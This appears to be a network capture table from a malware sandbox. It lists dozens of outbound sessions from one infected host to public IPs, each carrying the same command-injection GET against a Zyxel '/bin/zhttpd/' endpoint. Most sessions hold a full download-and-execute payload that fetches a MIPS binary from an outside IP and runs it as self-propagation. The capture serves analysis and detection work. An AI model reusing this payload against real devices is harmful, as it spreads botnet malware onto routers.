                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6192.168.2.1359578135.60.148.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604849100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7192.168.2.1350788131.221.180.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604903936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8192.168.2.1342900193.131.22.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604928970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9192.168.2.1344348115.139.90.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605010033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10192.168.2.1345044191.5.90.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605086088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11192.168.2.135391459.196.112.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605107069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12192.168.2.1339648108.231.227.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605107069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13192.168.2.1349404217.13.70.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605123043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14192.168.2.1356634155.26.86.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605155945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15192.168.2.135828664.195.87.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605197906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16192.168.2.1336000193.211.112.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605221033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17192.168.2.1340546154.139.45.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605257988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18192.168.2.134317451.130.35.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605312109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19192.168.2.1360404217.52.52.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605359077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20192.168.2.1340278195.28.154.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605377913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21192.168.2.1342804207.162.132.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605417967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22192.168.2.1336152120.207.212.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605499983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23192.168.2.135193625.103.13.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605529070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    24192.168.2.1346506171.51.66.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605575085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    25192.168.2.1356042129.13.197.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605628967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    26192.168.2.135598238.11.11.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605663061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    27192.168.2.134777097.197.27.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605698109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    28192.168.2.1336566162.63.126.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605707884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    29192.168.2.1346098135.77.44.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605766058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    30192.168.2.1358316159.215.31.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605804920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    31192.168.2.133313241.212.61.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605842113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    32192.168.2.1351762118.171.57.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605916023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    33192.168.2.1345554128.117.32.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605920076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    34192.168.2.135525863.217.253.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605931044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    35192.168.2.134119417.152.180.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.605994940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    36192.168.2.1335284172.122.248.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606051922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    37192.168.2.1353930100.174.31.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606071949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    38192.168.2.134112870.245.2.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606115103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    39192.168.2.136001277.248.50.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606178999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    40192.168.2.135810266.149.248.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606193066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    41192.168.2.1333304115.237.241.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606240988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    42192.168.2.1358150161.67.0.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606265068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    43192.168.2.1355778208.11.135.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606313944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    44192.168.2.1351534187.162.246.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606384993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    45192.168.2.134646460.152.57.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606415987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    46192.168.2.1347280145.128.135.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606443882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    47192.168.2.1358338129.187.122.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606487989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    48192.168.2.134882298.118.192.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606556892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    49192.168.2.1338004210.192.216.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606556892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    50192.168.2.1336084116.95.226.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606595039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    51192.168.2.135378614.123.16.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606637001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    52192.168.2.1358330209.199.79.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606683969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    53192.168.2.1344898191.72.179.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606718063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    54192.168.2.1359408107.128.242.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606750965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    55192.168.2.1342724152.83.8.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606839895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    56192.168.2.1339700151.221.5.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606842995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    57192.168.2.1346396177.15.235.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606892109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    58192.168.2.134024238.184.61.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606899023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    59192.168.2.1334200111.130.136.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.606956959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    60192.168.2.1334486180.107.105.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607017040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    61192.168.2.134700489.143.153.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607060909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    62192.168.2.1339654133.70.241.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607090950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    63192.168.2.135525635.101.194.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607127905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    64192.168.2.1352026189.111.186.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607172966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    65192.168.2.1358990138.246.141.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607207060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    66192.168.2.134516870.124.162.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607240915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    67192.168.2.134061685.16.74.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607266903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    68192.168.2.1339670135.235.33.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607289076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    69192.168.2.1358556204.153.97.162443
                                    TimestampBytes transferredDirectionData
